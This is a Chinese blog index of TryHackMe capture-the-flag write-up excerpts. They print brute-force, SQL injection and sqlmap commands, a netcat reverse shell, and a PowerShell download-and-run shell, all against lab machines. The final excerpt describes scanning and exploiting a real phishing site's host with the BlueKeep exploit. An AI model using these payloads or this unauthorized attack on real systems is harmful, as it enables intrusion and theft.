打靶记录(十)之THMOverpass
端口扫描
Nmap扫描还是得多扫几次,第一次扫出来没有结果
Web
打开看了一下,大概是一个密码管理软件?说密码复用什么7788的
Gobuster爆破一下目录,我们再随便翻一下有没有什么有用的信息
在AboutUs界面
能找到他们工作人员的名字,可能可以当做用户名,记录一下
Ninja - Lead Developer
Pars - Shibe Enthusiast and Emotional Support Animal Manager
Szymex - Head Of Security
Bee - Chief Drinking Water Coordinator
MuirlandOracle - Cryptography Consultant
在/admin可以找他们的后台,那就试着用Ninja当用户名爆破一下密码
hydra -l Ninja -P /usr/share/wordlists/rockyou.txt 10.10.226.91 http-post-form "/api/login:username=^USER^&password=^PASS^:Inc ...
打靶记录(九)之THMMrRobot
端口扫描
Web打开80端口是一些不明所以的界面,花里胡哨的很符合对嗨客的印象(
用gobuster扫一下目录
gobuster dir -u http://10.10.155.86/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
扫出来的大概是这些目录,每个目录都要简单的翻一下
在/robots目录可以找到两个文件,访问看看
第二个文件就是key1
073403c8a58a1f80d943455fb30724b9
第一个下载完打开感觉像是密码的字典?
既然有wordpress,那就上WPscan扫一下
wpscan --url http://10.10.155.86/
可以看到主题又是这个熟悉的twentyfifteen
本来想着是不是wordpress的用户名是user,然后指定用户名去爆破密码的,发现爆不出来
看了下WP,在登录界面,会提示用户名是否正确,用户名不存在则会提醒Invalid username,存在则会提醒密码不正确,根据这个特性,可以用burpsuite来测试用户名,利用 ...
打靶记录(八)之THMOverpass 2 - Hacked
分析PCAP他们用来上传反向shell的页面的URL是什么?
上传的话应该要涉及到http,那就过滤http协议
找到一条疑似shell的数据,追踪http流
那么URL就是/development/
攻击者使用了什么有效载荷来获得访问权限?
就是上面我划出来的那一条,reverse shell
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
攻击者使用了什么密码来保护c?
应该是连接shell之后,攻击者一系列的操作,那追踪TCP流看看,翻到第三个,追踪TCP流
可以看到一系列的操作
密码就是whenevernoteartinstant
攻击者如何建立持久性?
上面那个数据包往下翻
应该是下了一个ssh的后门文件
https://github.com/NinjaJc01/ssh-backdoor
使用快速通道单词表,有多少系统密码是可以破解 ...
打靶记录(七)之THMInternal
端口扫描
Web
打开网站的根目录是一个Apache的页面
日常扫一下目录,再结合一下nmap扫描的结果
进/blog页面看一下
应该是一个博客界面,根据上面漏洞扫描的结果等可以知道是一个WP搭建的站点,那么能利用的点就很多了,Wpscan什么的也能用。看下有没有可以利用的信息。这个页面似乎没有。
那就直接进登录界面
看看能不能用WPscan列举一下用户
wpscan --url http://internal.thm/wordpress/ --enumerate u
发现一个admin用户
还有WP使用的主题
没有插件
试着暴力破解一下密码
wpscan --url http://internal.thm/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin
密码是my2boys
发现成功登录后台
Getshell在之前可以得到WP的主题是tentyseventeenn,可以知道有一个非常著名的漏洞:在Appearance中可以修改主题
试着将index.php改成reverseshell(注意是PHP ...
打靶记录(六)之THMRelevant
端口扫描
用nmap自带的脚本扫一下有没有漏洞,发现了有一个RCE漏洞
Web
简单扫一下目录
大概率是没什么东西了
因为看到了3389这个端口开着,在前几篇的一个《钓鱼网站简单渗透测试》中就碰到过这玩意,还是挺熟悉的,那就直接用msf看看漏洞可不可用
发现好像没有
SMB服务那就直接从nmap发现的漏洞入手吧
use 4set LHOST tun0set RHOST 10.10.109.175run
发现运行不了
才发现这个房间好像不让用msf捏
查了一下,这好像是很有名的“永恒之蓝”漏洞?
那就先试着不用msf
既然是SMB服务上的漏洞,先试着用enum4linux扫描
发现也是什么都没有
smbclient -L 10.10.109.175
用来列举共享资源,发现不用密码(直接回车)就可以列举
也是不用密码就可以连接
get下来的password是这玩意,大概是base64编码过的
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
解码出来是这些东西,猜测是两个用户名和密码
上面扫描过程中发现3389 ...
打靶记录(五)之THMDailyBugle
端口扫描
Web谁抢了银行:SpiderMan
我直接:?????
日常进行目录扫描
gobuster dir -u http://10.10.74.159 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
扫出来大概是这些目录
THM问joomla的版本是多少,打开Wap插件看一下也确实是这个CMS
可以用joomscan来判断版本,kali中sudo apt-get install joomscan安装
joomscan -u http://10.10.74.159/
开启扫描
发现版本是3.7.0,而且也能列出目录
有了版本号就可以找漏洞了
searchsploit joomla 3.7.0
直接上github找个SQL注入的脚本
https://github.com/teranpeterson/Joomblah
得到密码hash
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
hash-identifier竟 ...
打靶记录(四)之THMSkynet
端口扫描
SMB服务发现有POP3和IMAP服务,感觉大概率和邮件有关,还是第一次接触这样的靶机
问Miles的邮箱密码,嘶没什么思路,一开始还用hydra来爆破IMAP端口,发现好像不行,看了下THM的提示,Enumerate Samba
于是试着用enum4linux来枚举SMB服务
kali中enum4linux ip
发现一个共享anonymous可以访问
smbclient //ip/共享 进行连接
ls发现了一个文本和一个logs文件夹
把全部get到本地,如get attention.txxt
总之就是所有人的密码被改了什么之类的
log的内容就很吸引人了,像是用户名(密码?)
log2和3都是空的,,,
Web到这里的线索似乎断了,因为不知道这个用于什么的,感觉方向太多,又是IMAP又是POP3什么的。先进入80的WEB端口看看
就这么一个界面,啥都没有,试着用gobuster爆破下目录
gobuster经常性感觉会出一些网络问题导致丢包。。。
找到个/admin的目录,进去看看,发现访问不了
试了几个发现就squirrelmail能访问,进去是个登录 ...
打靶记录(三)之THMGameZone
端口扫描
只开放了两个端口,大概率是在80端口做文章了
Web百度识图:杀手3主人公Agent 47
Sql注入手注在用户名输入:
‘or 1=1 – -
密码不填
查询语句变成
SELECT * FROM users WHERE username = ''or 1=1 -- -' AND password :=
前面为真,后面被注释,直接登录
被重定向到portal.php界面
SQLmap直接跟着做
右键保存至文件
在SQLmap中运行
sqlmap -r /home/mikannse/request –dbms=mysql –dump
hash:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
用户名:agent47
翻一下上面的记录,另外一个表名是post
密码爆破先识别一下哈希的类型
hash-identifier ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
根据结果大概率是SHA-256
用john ...
23.6杂谈
博客建立以来第一篇杂谈,打算每个月都写一点东西,总结记录下这个月的一些7788的东西。真的算得上是忙碌的一个月,虽然前后反差还挺大的。从准确来说是从上个月底的黑盾杯和国赛开始一直到前不久刚结束的各种考试,真的算是一直绷着神经硬撑到考试结束233,算是大学以来最忙碌的一段时间吧。每年的六月都算是最喜欢的时期吧,去年是考完高考的放松吧,不知不觉成为带学生已经一年了捏,而且也到了最喜欢的暑期。然后还有“日记周年”的时间,感觉是每一年中最年轻的一个月吧(笑)。考完试还是比较放松的吧,放松但不代表清闲,反而有很多事情想要做,但不是很多事情要被做。憋了一个月的THM瘾犯了,动力满满地疯狂学习+打靶机,还是挺开心的捏。但是放假后的时间几乎除了晚上回宿舍睡觉都呆在图书馆吧,前几天倒是和朋友久违的出去玩了一整天,很放松很开心的感觉,主要想做的事情实在是太多了。搭了一直想搭的博客,然后多多少少都会记录下发布一些文章,留给后人或者同好看233,主要还是想记录下人生什么的。这个月好像前几个都开始看的大江健三郎的《万延元年的FOOTBALL》是这个月一直在看的,真的是难读的一本书啊,也许是自己越来越浮躁而读 ...
打靶记录(二)之THMhackpark
端口扫描sudo nmap –min-rate 10000 -p- 10.10.116.243 -Pn
扫描全部端口,设置最小速度为10000
sudo nmap -sT -sV -O -p80,3389 10.10.116.243 -Pn
对指定的端口用TCP协议扫描,扫描版本号和操作系统
Web登录网站
要求得到小丑的名字,直接百度识图,是一部电影,主角叫Pennywise
爆破密码根据THM提示,在登录界面用Hydra爆破密码,账户名猜测为admin
在这之前用bp抓个包,随便输入1 1
将__VIEWSTATE到”Login+in”作为表单数据,Login failed为报错信息(在输入错误的用户名密码搭配时的提示错误信息)
表单路径为/Account/login.aspx
于是最终命令为(字典随便选了一个):
sudo hydra -l admin -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt 10.10.116.243 http-post-form "/Accoun ...
打靶记录(一)之THMAlfred
Initial Accessnmap扫描端口
浏览器访问8080端口的web服务,发现是一个Jenkins CMS
尝试admin admin 成功登录
也可以用hydra爆破,这里贴一张网上的WP图
稍微在网上搜索下这个比较经典的CMS,就可以知道这有个页面可以上我们RCE
https://github.com/samratashok/nishang
利用这其中的Invoke-PowerShellTcp.ps1来进行反向shell
在本地开启Python服务来让靶机下载我们的shell,开启nc来监听反向shell
在靶机上,用powershell脚本来进行反向shell的下载与连接,IP为自己攻击机的IP,
powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.17.49.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.49.170 -Port 1234
apply,s ...
记一次对钓鱼网站的简单渗透测试
碎碎念也算小学了几个月的渗透,没想到碰上了钓鱼邮件,这不得练练实战,狠狠得惩罚他(
信息搜集进入网站之后,发现是个QQ邮箱界面,当然看网址就一眼假
先通过ping得到他的真实IP,
https://ping.chinaz.com
是38.55.193.233准没错了
拿nmap狠狠地扫他
发现开启了80和3389两个端口,80端口比较平常,试着搜一下ms-wbt-server这个服务,发现了这个文章,竟然有CVE,是windows平台的
https://blog.csdn.net/s619782146/article/details/125540370
通过这个插件可以知道,主机的操作系统也确实是windows,这下可精神了。
开搞尝试搜索CVE-2019-0708,是一个RCE漏洞
打开我们的msf
search 0708
先扫描是否真的存在漏铜,所以 use 0
show options,要设置目标的主机
于是:set RHOSTS 38.55.193.233
run
发现存在漏洞!
下载POC
https://github.com/n1xbyte/CVE-2019 ...